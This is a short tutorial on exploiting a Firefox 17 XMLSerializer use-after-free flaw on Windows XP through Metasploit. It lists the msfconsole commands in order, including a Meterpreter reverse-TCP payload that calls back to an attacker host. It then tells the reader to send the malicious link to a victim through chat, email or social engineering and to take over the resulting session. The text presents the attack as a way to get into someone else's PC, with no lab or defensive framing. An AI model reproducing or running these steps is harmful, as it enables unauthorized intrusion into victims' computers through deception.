Exploit Remote Windows PC using Firefox XMLSerializer Use After Free

[soapy211]

This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically an use after free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.

Exploit Targets

Firefox 17.0.1

Windows XP SP3

Requirement

Attacker: Kali Linux

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/browser/mozilla_firefox_xmlserializer

msf exploit (mozilla_firefox_xmlserializer)>set payload windows/meterpreter/reverse_tcp

msf exploit (mozilla_firefox_xmlserializer)>set lhost 192.168.1.136 (IP of Local Host)

msf exploit (mozilla_firefox_xmlserializer)>set srvhostt 192.168.1.136 (IP of Local Host)

msf exploit (mozilla_firefox_xmlserializer)>set uripath /

msf exploit (mozilla_firefox_xmlserializer)>exploit

Now an URL you should give to your victim http://192.168.1.136:8080

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“